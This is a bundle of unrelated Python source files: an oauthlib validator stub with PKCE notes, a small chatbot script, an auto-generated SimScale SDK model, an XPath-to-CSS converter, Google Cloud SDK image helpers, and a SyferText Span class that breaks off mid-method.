to a valid resource owner, i.e. request.user = username or similar. If
not set you will be unable to associate a token with a user in the
persistence method used (commonly, save_bearer_token).
:param username: Unicode username.
:param password: Unicode password.
:param client: Client object set by you, see ``.authenticate_client``.
:param request: OAuthlib request.
:type request: oauthlib.common.Request
:rtype: True or False
Method is used by:
- Resource Owner Password Credentials Grant
"""
raise NotImplementedError('Subclasses must implement this method.')
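# A sketch with a hypothetical user store; note that request.user must be
# set on success:
#
#     def validate_user(self, username, password, client, request,
#                       *args, **kwargs):
#         user = self.db.users.authenticate(username, password)
#         if user is None:
#             return False
#         request.user = user
#         return True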
def validate_user_match(self, id_token_hint, scopes, claims, request):
"""Ensure client supplied user id hint matches session user.
If the sub claim or id_token_hint is supplied then the session
user must match the given ID.
:param id_token_hint: User identifier string.
:param scopes: List of OAuth 2 scopes and OpenID claims (strings).
:param claims: OpenID Connect claims dict.
:param request: OAuthlib request.
:type request: oauthlib.common.Request
:rtype: True or False
Method is used by:
- OpenIDConnectAuthCode
- OpenIDConnectImplicit
- OpenIDConnectHybrid
"""
raise NotImplementedError('Subclasses must implement this method.')
def is_pkce_required(self, client_id, request):
"""Determine if current request requires PKCE. Default, False.
This is called for both "authorization" and "token" requests.
Override this method to ``return True`` to enable PKCE for everyone.
You might want to enable it only for public clients.
Note that PKCE can also be used in addition to client authentication.
OAuth 2.0 public clients utilizing the Authorization Code Grant are
susceptible to the authorization code interception attack. This
specification describes the attack as well as a technique to mitigate
the threat through the use of Proof Key for Code Exchange
(PKCE, pronounced "pixy"). See `RFC7636`_.
:param client_id: Client identifier.
:param request: OAuthlib request.
:type request: oauthlib.common.Request
:rtype: True or False
Method is used by:
- Authorization Code Grant
.. _`RFC7636`: https://tools.ietf.org/html/rfc7636
"""
return False
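# An illustrative override enabling PKCE only for public clients
# (`client_type` is a hypothetical attribute of your client model):
#
#     def is_pkce_required(self, client_id, request):
#         client = self.db.clients.find(client_id)
#         return client is not None and client.client_type == "public"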
def get_code_challenge(self, code, request):
"""Is called for every "token" requests.
When the server issues the authorization code in the authorization
response, it MUST associate the ``code_challenge`` and
``code_challenge_method`` values with the authorization code so it can
be verified later.
Typically, the ``code_challenge`` and ``code_challenge_method`` values
are stored in encrypted form in the ``code`` itself but could
alternatively be stored on the server associated with the code. The
server MUST NOT include the ``code_challenge`` value in client requests
in a form that other entities can extract.
Return the ``code_challenge`` associated to the code.
If ``None`` is returned, the code is considered not to be associated with
any challenge.
:param code: Authorization code.
:param request: OAuthlib request.
:type request: oauthlib.common.Request
:rtype: code_challenge string
Method is used by:
- Authorization Code Grant - when PKCE is active
"""
return None
def get_code_challenge_method(self, code, request):
"""Is called during the "token" request processing, when a
``code_verifier`` and a ``code_challenge`` has been provided.
See ``.get_code_challenge``.
Must return ``plain`` or ``S256``. You can return a custom value if you have
implemented your own ``AuthorizationCodeGrant`` class.
:param code: Authorization code.
:param request: OAuthlib request.
:type request: oauthlib.common.Request
:rtype: code_challenge_method string
Method is used by:
- Authorization Code Grant - when PKCE is active
"""
raise NotImplementedError('Subclasses must implement this method.')
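# A sketch for the two PKCE getters, assuming the challenge was stored
# alongside the code (hypothetical `self.db`):
#
#     def get_code_challenge(self, code, request):
#         grant = self.db.codes.find(code=code)
#         return grant.code_challenge if grant else None
#
#     def get_code_challenge_method(self, code, request):
#         grant = self.db.codes.find(code=code)
#         return grant.code_challenge_method if grant else None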

# ============================================================================
# File: main.py | Repo: sycomix/aio-bot | License: CC0-1.0
# ============================================================================

import os
from datetime import datetime
from os import path

# NOTE: `utils` is expected to provide Chat, decryp, encryp, sas, etc.;
# the explicit imports above are added in case the star import does not
# re-export `os` and `datetime`.
from utils import *


def chat():
    nam = "Unknown"
    # call = multiFunctionCall({"whoIs":whoIs,"emo":emo, "identifyu":identifyu, "whathappen":whathappen, "learnq":learnq, "learna":learna})
    firstQuestion = "Hi, I am chatbot."
    template = "Unknown.template"
    # Decrypt the template, run the conversation, then re-encrypt it below.
    decryp(template)
    Chat(template).converse(firstQuestion)
    # If the conversation produced a mood/reason log, append it to the
    # user's template and remove the temporary file.
    if path.exists(nam + ".txt"):
        with open(nam + ".txt", "r") as myfile:
            daa = myfile.read()
        with open(nam + ".template", "a") as myf:
            now = str(datetime.now())
            myf.write("\n{ mood " + now + ": " + sas(daa) + " }")
            myf.write("\n{ reason " + now + ": " + daa + " }")
        os.remove(nam + ".txt")
    # Newly learned question/answer pairs are appended in the same way.
    if path.exists("learn.txt"):
        with open("learn.txt", "r") as myfile:
            daa = myfile.read()
        with open(nam + ".template", "a") as myf:
            myf.write(daa)
        os.remove("learn.txt")
    encryp(template)


chat()

# ============================================================================
# File: simscale_sdk/models/dimensional_partial_vector_function_angle.py
# Repo: slainesimscale/simscale-python-sdk | License: MIT
# ============================================================================

# coding: utf-8
"""
SimScale API
The version of the OpenAPI document: 0.0.0
Generated by: https://openapi-generator.tech
"""
import pprint
import re # noqa: F401
import six
from simscale_sdk.configuration import Configuration
class DimensionalPartialVectorFunctionAngle(object):
"""NOTE: This class is auto generated by OpenAPI Generator.
Ref: https://openapi-generator.tech
Do not edit the class manually.
"""
"""
Attributes:
openapi_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
openapi_types = {
'value': 'PartialVectorFunction',
'unit': 'str'
}
attribute_map = {
'value': 'value',
'unit': 'unit'
}
def __init__(self, value=None, unit=None, local_vars_configuration=None): # noqa: E501
"""DimensionalPartialVectorFunctionAngle - a model defined in OpenAPI""" # noqa: E501
if local_vars_configuration is None:
local_vars_configuration = Configuration()
self.local_vars_configuration = local_vars_configuration
self._value = None
self._unit = None
self.discriminator = None
if value is not None:
self.value = value
self.unit = unit
@property
def value(self):
"""Gets the value of this DimensionalPartialVectorFunctionAngle. # noqa: E501
:return: The value of this DimensionalPartialVectorFunctionAngle. # noqa: E501
:rtype: PartialVectorFunction
"""
return self._value
@value.setter
def value(self, value):
"""Sets the value of this DimensionalPartialVectorFunctionAngle.
:param value: The value of this DimensionalPartialVectorFunctionAngle. # noqa: E501
:type: PartialVectorFunction
"""
self._value = value
@property
def unit(self):
"""Gets the unit of this DimensionalPartialVectorFunctionAngle. # noqa: E501
:return: The unit of this DimensionalPartialVectorFunctionAngle. # noqa: E501
:rtype: str
"""
return self._unit
@unit.setter
def unit(self, unit):
"""Sets the unit of this DimensionalPartialVectorFunctionAngle.
:param unit: The unit of this DimensionalPartialVectorFunctionAngle. # noqa: E501
:type: str
"""
if self.local_vars_configuration.client_side_validation and unit is None: # noqa: E501
raise ValueError("Invalid value for `unit`, must not be `None`") # noqa: E501
allowed_values = ["rad", "°"] # noqa: E501
if self.local_vars_configuration.client_side_validation and unit not in allowed_values: # noqa: E501
raise ValueError(
"Invalid value for `unit` ({0}), must be one of {1}" # noqa: E501
.format(unit, allowed_values)
)
self._unit = unit
def to_dict(self):
"""Returns the model properties as a dict"""
result = {}
for attr, _ in six.iteritems(self.openapi_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
return result
def to_str(self):
"""Returns the string representation of the model"""
return pprint.pformat(self.to_dict())
def __repr__(self):
"""For `print` and `pprint`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, DimensionalPartialVectorFunctionAngle):
return False
return self.to_dict() == other.to_dict()
def __ne__(self, other):
"""Returns true if both objects are not equal"""
if not isinstance(other, DimensionalPartialVectorFunctionAngle):
return True
return self.to_dict() != other.to_dict()
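# A brief usage sketch (illustrative; `unit` must be one of the allowed
# values "rad" or "°" enforced by the setter above):
#
#     angle = DimensionalPartialVectorFunctionAngle(unit="rad")
#     angle.to_dict()   # -> {'value': None, 'unit': 'rad'}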

# ============================================================================
# File: sel4/core/helpers__/translator.py | Repo: daniv/sel4 | License: MIT
# ============================================================================

import re
from cssselect import GenericTranslator
from loguru import logger
from sel4.utils.functional import lazy, keep_lazy
from sel4.utils.regex_helper import _lazy_re_compile
class XpathException(Exception):
pass
_sub_regexes = {
"tag": r"([a-zA-Z][a-zA-Z0-9]{0,10}|\*)",
"attribute": r"[.a-zA-Z_:][-\w:.]*(\(\))?)",
"value": r"\s*[\w/:][-/\w\s,:;.\S]*",
}
_validation_re = (
r"(?P<node>"
r"("
r"^id\([\"\']?(?P<idvalue>%(value)s)[\"\']?\)"
r"|"
r"(?P<nav>//?)(?P<tag>%(tag)s)"
r"(\[("
r"(?P<matched>(?P<mattr>@?%(attribute)s=[\"\']"
r"(?P<mvalue>%(value)s))[\"\']"
r"|"
r"(?P<contained>contains\((?P<cattr>@?%(attribute)s,\s*[\"\']"
r"(?P<cvalue>%(value)s)[\"\']\))"
r")\])?"
r"(\[(?P<nth>\d+)\])?"
r")"
r")" % _sub_regexes
)
prog = _lazy_re_compile(_validation_re)
class CssTranslator(GenericTranslator):
def css_to_xpath(self, css, prefix="//"):
return super(CssTranslator, self).css_to_xpath(css, prefix)
def xpath_attrib_equals(self, xpath, name, value):
xpath.add_condition("%s=%s" % (name, self.xpath_literal(value)))
return xpath
def xpath_attrib_includes(self, xpath, name, value):
from cssselect.xpath import is_non_whitespace
if is_non_whitespace(value):
xpath.add_condition(
"contains(%s, %s)" % (name, self.xpath_literal(value))
)
else:
xpath.add_condition("0")
return xpath
def xpath_attrib_substringmatch(self, xpath, name, value):
if value:
# Attribute selectors are case sensitive
xpath.add_condition(
"contains(%s, %s)" % (name, self.xpath_literal(value))
)
else:
xpath.add_condition("0")
return xpath
def xpath_class(self, class_selector):
xpath = self.xpath(class_selector.selector)
return self.xpath_attrib_includes(
xpath, "@class", class_selector.class_name
)
def xpath_descendant_combinator(self, left, right):
"""right is a child, grand-child or further descendant of left"""
return left.join("//", right)
@keep_lazy
def convert_xpath_to_css(xpath) -> str:
xpath = xpath.replace(" = '", "='")
# region Start handling special xpath ms-edge cases
logger.trace("Start handling special xpath ms-edge cases")
c3 = "@class and contains(concat(' ', normalize-space(@class), ' '), ' "
if c3 in xpath and xpath.count(c3) == 1 and xpath.count("[@") == 1:
p2 = " ') and (contains(., '"
if (
xpath.count(p2) == 1
and xpath.endswith("'))]")
and xpath.count("//") == 1
and xpath.count(" ') and (") == 1
):
s_contains = xpath.split(p2)[1].split("'))]")[0]
s_tag = xpath.split("//")[1].split("[@class")[0]
s_class = xpath.split(c3)[1].split(" ') and (")[0]
return '%s.%s:contains("%s")' % (s_tag, s_class, s_contains)
# Find instance of: //tag[@attribute='value' and (contains(., 'TEXT'))]
data = re.match(
r"""^\s*//(\S+)\[@(\S+)='(\S+)'\s+and\s+"""
r"""\(contains\(\.,\s'(\S+)'\)\)\]""",
xpath,
)
if data:
s_tag = data.group(1)
s_atr = data.group(2)
s_val = data.group(3)
s_contains = data.group(4)
return '%s[%s="%s"]:contains("%s")' % (s_tag, s_atr, s_val, s_contains)
# Find instance of: //tag[@attribute1='value1' and (@attribute2='value2')]
data = re.match(
r"""^\s*//(\S+)\[@(\S+)='(\S+)'\s+and\s+"""
r"""\(@(\S+)='(\S+)'\)\]""",
xpath,
)
if data:
s_tag = data.group(1)
s_atr1 = data.group(2)
s_val1 = data.group(3)
s_atr2 = data.group(4)
s_val2 = data.group(5)
return '%s[%s="%s"][%s="%s"]' % (s_tag, s_atr1, s_val1, s_atr2, s_val2)
logger.trace("End of handling special xpath ms-edge cases")
# endregion Start handling special xpath ms-edge case
if xpath[0] != '"' and xpath[-1] != '"' and xpath.count('"') % 2 == 0:
logger.trace("Handling brackets in strings")
xpath = _handle_brackets_in_strings(xpath)
xpath = xpath.replace("descendant-or-self::*/", "descORself/")
if len(xpath) > 3:
xpath = xpath[0:3] + xpath[3:].replace("//", "/descORself/")
if " and contains(@" in xpath and xpath.count(" and contains(@") == 1:
spot1 = xpath.find(" and contains(@")
spot1 = spot1 + len(" and contains(@")
spot2 = xpath.find(",", spot1)
attr = xpath[spot1:spot2]
swap = " and contains(@%s, " % attr
if swap in xpath:
swap_spot = xpath.find(swap)
close_paren = xpath.find("]", swap_spot) - 1
close_paren_p1 = close_paren + 1 # Make "flake8" and "black" agree
if close_paren > 1:
xpath = xpath[:close_paren] + xpath[close_paren_p1:]
xpath = xpath.replace(swap, "_STAR_=")
if xpath.startswith("("):
logger.trace("Filtering xpath grouping")
xpath = _filter_xpath_grouping(xpath)
logger.trace("Get raw css from xpath")
css = _get_raw_css_from_xpath(xpath)
attribute_defs = re.findall(r"(\[\w+\=\S+\])", css)
for attr_def in attribute_defs:
if (
attr_def.count("[") == 1
and attr_def.count("]") == 1
and attr_def.count("=") == 1
and attr_def.count('"') == 0
and attr_def.count("'") == 0
and attr_def.count(" ") == 0
):
# Now safe to manipulate
q1 = attr_def.find("=") + 1
q2 = attr_def.find("]")
new_attr_def = attr_def[:q1] + "'" + attr_def[q1:q2] + "']"
css = css.replace(attr_def, new_attr_def)
logger.trace("Replace the string-brackets with escaped ones")
css = css.replace("_STR_L_bracket_", "\\[")
css = css.replace("_STR_R_bracket_", "\\]")
logger.trace("Handle a lot of edge cases with conversion")
css = css.replace(" > descORself > ", " ")
css = css.replace(" descORself > ", " ")
css = css.replace("/descORself/*", " ")
css = css.replace("/descORself/", " ")
css = css.replace("descORself > ", "")
css = css.replace("descORself/", " ")
css = css.replace("descORself", " ")
css = css.replace("_STAR_=", "*=")
css = css.replace("]/", "] ")
css = css.replace("] *[", "] > [")
css = css.replace("'", '"')
css = css.replace("[@", "[")
return css
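# A brief usage sketch (illustrative outputs, derived from the matching
# rules above):
#
#     convert_xpath_to_css('//div[@id="main"]')
#     # -> 'div#main'
#     convert_xpath_to_css("//a[contains(., 'Log')]")
#     # -> 'a:contains("Log")'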
@keep_lazy
def _get_raw_css_from_xpath(xpath: str) -> str:
css = ""
attr = ""
position = 0
while position < len(xpath):
node = prog.match(xpath[position:])
if node is None:
raise XpathException("Invalid or unsupported Xpath: %s" % xpath)
match = node.groupdict()
if position != 0:
nav = " " if match["nav"] == "//" else " > "
else:
nav = ""
tag = "" if match["tag"] == "*" else match["tag"] or ""
if match["idvalue"]:
attr = "#%s" % match["idvalue"].replace(" ", "#")
elif match["matched"]:
if match["mattr"] == "@id":
attr = "#%s" % match["mvalue"].replace(" ", "#")
elif match["mattr"] == "@class":
attr = ".%s" % match["mvalue"].replace(" ", ".")
elif match["mattr"] in ["text()", "."]:
attr = ":contains(^%s$)" % match["mvalue"]
elif match["mattr"]:
attr = '[%s="%s"]' % (
match["mattr"].replace("@", ""),
match["mvalue"],
)
elif match["contained"]:
if match["cattr"].startswith("@"):
attr = '[%s*="%s"]' % (
match["cattr"].replace("@", ""),
match["cvalue"],
)
elif match["cattr"] == "text()":
attr = ':contains("%s")' % match["cvalue"]
elif match["cattr"] == ".":
attr = ':contains("%s")' % match["cvalue"]
else:
attr = ""
if match["nth"]:
nth = ":nth-of-type(%s)" % match["nth"]
else:
nth = ""
node_css = nav + tag + attr + nth
css += node_css
position += node.end()
else:
css = css.strip()
return css
@keep_lazy
def _filter_xpath_grouping(xpath: str) -> str:
"""
This method removes the outer parentheses for xpath grouping.
The xpath converter will break otherwise.
Example:
"(//button[@type='submit'])[1]" becomes "//button[@type='submit'][1]"
"""
# First remove the first open parentheses
xpath = xpath[1:]
# Next remove the last closed parentheses
index = xpath.rfind(")")
index_p1 = index + 1 # Make "flake8" and "black" agree
if index == -1:
raise XpathException("Invalid or unsupported Xpath: %s" % xpath)
xpath = xpath[:index] + xpath[index_p1:]
return xpath
@keep_lazy
def _handle_brackets_in_strings(xpath: str) -> str:
# Edge Case: Brackets in strings.
# Example from GitHub.com -
# '<input type="text" id="user[login]">' => '//*[@id="user[login]"]'
# Need to tell apart string-brackets from regular brackets
new_xpath = ""
chunks = xpath.split('"')
len_chunks = len(chunks)
for chunk_num in range(len_chunks):
if chunk_num % 2 != 0:
chunks[chunk_num] = chunks[chunk_num].replace(
"[", "_STR_L_bracket_"
)
chunks[chunk_num] = chunks[chunk_num].replace(
"]", "_STR_R_bracket_"
)
new_xpath += chunks[chunk_num]
if chunk_num != len_chunks - 1:
new_xpath += '"'
return new_xpath

# ============================================================================
# File: lib/googlecloudsdk/api_lib/compute/image_utils.py
# Repo: bshaffer/google-cloud-sdk | License: Apache-2.0
# ============================================================================

# -*- coding: utf-8 -*- #
# Copyright 2014 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Common classes and functions for images."""
from __future__ import absolute_import
from __future__ import division
from __future__ import unicode_literals
from googlecloudsdk.api_lib.compute import constants
from googlecloudsdk.api_lib.compute import request_helper
from googlecloudsdk.api_lib.compute import utils
from googlecloudsdk.calliope import arg_parsers
from googlecloudsdk.calliope import base
from googlecloudsdk.core import log
from googlecloudsdk.core import properties
from googlecloudsdk.core.console import console_io
FAMILY_PREFIX = 'family/'
GUEST_OS_FEATURES = ['MULTI_IP_SUBNET',
'SECURE_BOOT',
'UEFI_COMPATIBLE',
'VIRTIO_SCSI_MULTIQUEUE',
'WINDOWS',
]
GUEST_OS_FEATURES_BETA = ['MULTI_IP_SUBNET',
'SECURE_BOOT',
'UEFI_COMPATIBLE',
'VIRTIO_SCSI_MULTIQUEUE',
'WINDOWS',
]
GUEST_OS_FEATURES_ALPHA = ['MULTI_IP_SUBNET',
'SECURE_BOOT',
'UEFI_COMPATIBLE',
'VIRTIO_SCSI_MULTIQUEUE',
'WINDOWS',
'GVNIC'
]
class ImageExpander(object):
"""Class for expanding image aliases."""
def __init__(self, compute_client, resources):
"""Instantiate ImageExpander and embed all required data into it.
ImageExpander is a class depending on "base_classes"
class layout (properties side-derived from one of base_class class). This
function can be used to avoid unfeasible inheritance and use composition
instead when refactoring away from base_classes into stateless style.
This constructor embeds following properties into ImageExpander instance:
- compute
- messages
- http
- batch_url
- resources
Example:
compute_holder = base_classes.ComputeApiHolder(self.ReleaseTrack())
client = compute_holder.client
resources = compute_holder.resources
image_expander = ImageExpander(client, resources)
or
image_expander = ImageExpander(self.compute_client, self.resources)
to use in a class derived from some of base_classes
image_expander.ExpandImageFlag(...)
Args:
compute_client: compute_holder.client
resources: compute_holder.resources
"""
self._compute = compute_client.apitools_client
self._messages = compute_client.messages
self._http = compute_client.apitools_client.http
self._batch_url = compute_client.batch_url
self._resources = resources
def GetMatchingImages(self, user_project, image, alias, errors):
"""Yields images from a public image project and the user's project."""
service = self._compute.images
requests = [
(service,
'List',
self._messages.ComputeImagesListRequest(
filter='name eq ^{0}(-.+)*-v.+'.format(alias.name_prefix),
maxResults=constants.MAX_RESULTS_PER_PAGE,
project=alias.project)),
(service,
'List',
self._messages.ComputeImagesListRequest(
filter='name eq ^{0}$'.format(image),
maxResults=constants.MAX_RESULTS_PER_PAGE,
project=user_project)),
]
return request_helper.MakeRequests(
requests=requests,
http=self._http,
batch_url=self._batch_url,
errors=errors)
def GetImage(self, image_ref):
"""Returns the image resource corresponding to the given reference."""
errors = []
requests = []
name = image_ref.Name()
if name.startswith(FAMILY_PREFIX):
requests.append((self._compute.images,
'GetFromFamily',
self._messages.ComputeImagesGetFromFamilyRequest(
family=name[len(FAMILY_PREFIX):],
project=image_ref.project)))
else:
requests.append((self._compute.images,
'Get',
self._messages.ComputeImagesGetRequest(
image=name,
project=image_ref.project)))
res = list(request_helper.MakeRequests(
requests=requests,
http=self._http,
batch_url=self._batch_url,
errors=errors))
if errors:
utils.RaiseException(
errors,
utils.ImageNotFoundError,
error_message='Could not fetch image resource:')
return res[0]
def ExpandImageFlag(self,
user_project,
image=None,
image_family=None,
image_project=None,
return_image_resource=False):
"""Resolves the image or image-family value.
If the value of image is one of the aliases defined in the
constants module, both the user's project and the public image
project for the alias are queried. Otherwise, only the user's
project is queried. If image is an alias and image-project is
provided, only the given project is queried.
Args:
user_project: The user's project.
image: The name of the image.
image_family: The family of the image. Is ignored if image name is
specified.
image_project: The project of the image.
return_image_resource: If True, always makes an API call to also
fetch the image resource.
Returns:
A tuple where the first element is the self link of the image. If
return_image_resource is False, the second element is None, otherwise
it is the image resource.
"""
# If an image project was specified, then assume that image refers
# to an image in that project.
if image_project:
image_project_ref = self._resources.Parse(
image_project, collection='compute.projects')
image_project = image_project_ref.Name()
image_ref = None
if image:
image_ref = self._resources.Parse(
image,
params={
'project': image_project
or properties.VALUES.core.project.GetOrFail,
},
collection='compute.images')
else:
if image_family is not None:
image_ref = self._resources.Parse(
image_family,
params={
'project': image_project
or properties.VALUES.core.project.GetOrFail
},
collection='compute.images')
else:
image_ref = self._resources.Parse(
constants.DEFAULT_IMAGE_FAMILY,
collection='compute.images',
params={'project': 'debian-cloud'})
if not image_ref.image.startswith(FAMILY_PREFIX):
relative_name = image_ref.RelativeName()
relative_name = (relative_name[:-len(image_ref.image)] +
FAMILY_PREFIX + image_ref.image)
image_ref = self._resources.ParseRelativeName(
relative_name, image_ref.Collection())
if image_project:
return (image_ref.SelfLink(),
self.GetImage(image_ref) if return_image_resource else None)
alias = constants.IMAGE_ALIASES.get(image_ref.Name())
# Check for hidden aliases.
if not alias:
alias = constants.HIDDEN_IMAGE_ALIASES.get(image_ref.Name())
# If the image name given is not an alias and no image project was
# provided, then assume that the image value refers to an image in
# the user's project.
if not alias:
return (image_ref.SelfLink(),
self.GetImage(image_ref) if return_image_resource else None)
# At this point, the image is an alias and now we have to find the
# latest one among the public image project and the user's
# project.
WarnAlias(alias)
errors = []
images = self.GetMatchingImages(user_project, image_ref.Name(), alias,
errors)
user_image = None
public_images = []
for image in images:
if image.deprecated:
continue
image_ref2 = self._resources.Parse(
image.selfLink, collection='compute.images', enforce_collection=True)
if image_ref2.project == user_project:
user_image = image
else:
public_images.append(image)
if errors or not public_images:
# This should happen only if there is something wrong with the
# image project (e.g., operator error) or the global control
# plane is down.
utils.RaiseToolException(
errors,
'Failed to find image for alias [{0}] in public image project [{1}].'
.format(image_ref.Name(), alias.project))
def GetVersion(image):
"""Extracts the "20140718" from an image name like "debian-v20140718"."""
parts = image.name.rsplit('v', 1)
if len(parts) != 2:
log.debug('Skipping image with malformed name [%s].', image.name)
return ''
return parts[1]
public_candidate = max(public_images, key=GetVersion)
if user_image:
options = [user_image, public_candidate]
idx = console_io.PromptChoice(
options=[image.selfLink for image in options],
default=0,
message=('Found two possible choices for [--image] value [{0}].'
.format(image_ref.Name())))
res = options[idx]
else:
res = public_candidate
log.debug('Image resolved to [%s].', res.selfLink)
return (res.selfLink, res if return_image_resource else None)
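# A hedged usage sketch (example values; see the docstring above for the
# argument semantics):
#
#     expander = ImageExpander(client, resources)
#     self_link, image = expander.ExpandImageFlag(
#         user_project='my-project',
#         image_family='debian-9',
#         image_project='debian-cloud',
#         return_image_resource=True)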
def HasWindowsLicense(resource, resource_parser):
"""Returns True if the given image or disk has a Windows license."""
for license_uri in resource.licenses:
license_ref = resource_parser.Parse(
license_uri, collection='compute.licenses')
if license_ref.project in constants.WINDOWS_IMAGE_PROJECTS:
return True
return False
def AddImageProjectFlag(parser):
"""Adds the --image flag to the given parser."""
parser.add_argument(
'--image-project',
help="""\
The project against which all image and image family references will be
resolved. It is best practice to define image-project.
* If specifying one of our public images, image-project must be
provided.
* If there are several of the same image-family value in multiple
projects, image-project must be specified to clarify the image to
be used.
* If not specified and either image or image-family is provided, the
current default project is used.
""")
def WarnAlias(alias):
"""WarnAlias outputs a warning telling users to not use the given alias."""
msg = ('Image aliases are deprecated and will be removed in a future '
'version. ')
if alias.family is not None:
msg += ('Please use --image-family={family} and --image-project={project} '
'instead.').format(family=alias.family, project=alias.project)
else:
msg += 'Please use --image-family and --image-project instead.'
log.warning(msg)
def AddGuestOsFeaturesArg(parser, release_track):
"""Add the guest-os-features arg."""
# Alpha and Beta Args
guest_os_features = []
if release_track == base.ReleaseTrack.GA:
guest_os_features = GUEST_OS_FEATURES
elif release_track == base.ReleaseTrack.BETA:
guest_os_features = GUEST_OS_FEATURES_BETA
elif release_track == base.ReleaseTrack.ALPHA:
guest_os_features = GUEST_OS_FEATURES_ALPHA
if not guest_os_features:
return
parser.add_argument(
'--guest-os-features',
metavar='GUEST_OS_FEATURE',
type=arg_parsers.ArgList(
element_type=lambda x: x.upper(), choices=guest_os_features),
help="""\
This parameter enables one or more features for VM instances that use the
image for their boot disks. The following features are available:
* MULTI_IP_SUBNET - For configuring interfaces with a netmask other than
/32.
* SECURE_BOOT - Enables UEFI secure boot, which restricts unsigned
software from booting or unsigned drivers from loading on the VM
instance.
* UEFI_COMPATIBLE - Enables UEFI booting, which is an alternative system
boot method. Most public images use the GRUB bootloader as their
primary boot method.
* VIRTIO_SCSI_MULTIQUEUE - Enables multiqueue SCSI capabilities for
Local SSD devices. This option is an alternative to NVMe.
* For Linux images, you can enable VIRTIO_SCSI_MULTIQUEUE on images
with kernel versions 3.17 and higher.
* For Windows images, you can enable VIRTIO_SCSI_MULTIQUEUE on images
with driver version 1.2.0.1621 or higher.
* WINDOWS - Required for Windows Server images. Newer public images for
Windows server include the WINDOWS parameter to indicate that it is a
Windows image.
""")

# ============================================================================
# File: syfertext/span.py | Repo: shashank-m/SyferText | License: Apache-2.0
# ============================================================================

import syft
import torch
hook = syft.TorchHook(torch)
from syft.generic.object import AbstractObject
from syft.workers.base import BaseWorker
from syfertext.token import Token
from typing import List
from typing import Dict
from typing import Set
from typing import Union
from .underscore import Underscore
from .utils import normalize_slice
class Span(AbstractObject):
"""A slice from a Doc object.
"""
def __init__(
self, doc: "Doc", start: int, end: int, id: int = None, owner: BaseWorker = None,
):
"""Create a `Span` object from the slice `doc[start : end]`.
Args:
doc (Doc): The parent document.
start (int): The index of the first token of the span.
end (int): The index of the first token after the span.
Returns (Span):
The newly constructed object.
"""
super(Span, self).__init__(id=id, owner=owner)
self.doc = doc
self.start = start
        # We don't need to handle `None` here; it will be handled by
        # `normalize_slice`, which also takes care of invalid ranges.
self.end = end
# This is used to keep track of the client worker that this span
# caters to.
# Usually, it would be the worker operating the pipeline.
# we set this equal to `doc.client_id` as span's client will be same as doc's client
self.client_id = doc.client_id
# The owner of the span object will be same worker where doc resides
self.owner = doc.owner
# Initialize the Underscore object (inspired by spaCy)
# This object will hold all the custom attributes set
# using the `self.set_attribute` method
self._ = Underscore()
def set_attribute(self, name: str, value: object):
"""Creates a custom attribute with the name `name` and
value `value` in the Underscore object `self._`
Args:
name (str): name of the custom attribute.
value (object): value of the custom named attribute.
"""
        # Make sure there is no space in the name, and prevent an empty name.
assert (
isinstance(name, str) and len(name) > 0 and (not (" " in name))
), "Argument `name` should be a non-empty `str` type containing no spaces"
setattr(self._, name, value)
def __getitem__(self, key: Union[int, slice]):
"""Returns a Token object at position `key` or returns Span using slice `key` or the
id of the Token object or id of the Span object at remote location.
Args:
key (int or slice): The index of the token within the span, or slice of
the span to get.
Returns:
Token or Span or id of the Token or id of the Span
"""
if isinstance(key, int):
if key < 0:
token_meta = self.doc.container[self.end + key]
else:
token_meta = self.doc.container[self.start + key]
# Create a Token object with owner same as the span object
token = Token(doc=self.doc, token_meta=token_meta, position=key, owner=self.owner)
return token
if isinstance(key, slice):
# normalize to handle negative slicing
start, end = normalize_slice(len(self), key.start, key.stop, key.step)
# shift the origin
start += self.start
end += self.start
# Assign the new span to the same owner as this object
owner = self.owner
# Create a new span object
span = Span(self.doc, start, end, owner=owner)
# If the following condition is satisfied, this means that this
# Span is on a different worker (the Span's owner) than the one where
# the Language object that operates the pipeline is located (the Span's client).
# In this case we will create the new Span at the same worker as
# this Span, and return its ID to the client worker where a SpanPointer
# will be made out of this id.
if span.owner.id != span.client_id:
# Register the Span on it's owners object store
self.owner.register_obj(obj=span)
# Return span_id using which we can create the SpanPointer
return span.id
return span
def __len__(self):
"""Return the number of tokens in the Span."""
return self.end - self.start
def __iter__(self):
"""Allows to loop over tokens in `Span.doc`"""
for i in range(len(self)):
# Yield a Token object
yield self[i]
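    # A small usage sketch (assumes the parent Doc supports slicing and
    # returns a local Span, i.e. owner and client are the same worker):
    #
    #     span = doc[2:5]   # Span over tokens 2, 3 and 4
    #     first = span[0]   # Token at span-relative position 0
    #     sub = span[1:]    # sub-Span, re-based onto the parent Doc
    #     len(span)         # -> 3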
@property
def vector(self):
"""Get span vector as an average of in-vocabulary token's vectors
Returns:
span_vector: span vector
"""
# Accumulate the vectors here
vectors = None
# Count the tokens that have vectors
vector_count = 0
for token in self:
# Get the vector of the token if one exists
if token.has_vector:
# Increment the vector counter
vector_count += 1
                # Accumulate the token vectors by summing them
                vectors = token.vector if vectors is None else vectors + token.vector
        # If no tokens with vectors were found, just use the default vector (zeros)
if vector_count == 0:
span_vector = self.doc.vocab.vectors.default_vector
else:
# Create the final span vector
span_vector = vectors / vector_count
return span_vector
def get_vector(self, excluded_tokens: Dict[str, Set[object]] = None):
"""Get Span vector as an average of in-vocabulary token's vectors,
excluding token according to the excluded_tokens dictionary.
Args:
excluded_tokens (Dict): A dictionary used to ignore tokens of the document based on values
of their attributes, the keys are the attributes names and they index, for efficiency, sets of values.
Example: {'attribute1_name' : {value1, value2}, 'attribute2_name': {v1, v2}, ....}
Returns:
span_vector: Span vector ignoring excluded tokens
"""
# If the excluded_token dict in None then all token are included
if excluded_tokens is None:
return self.vector
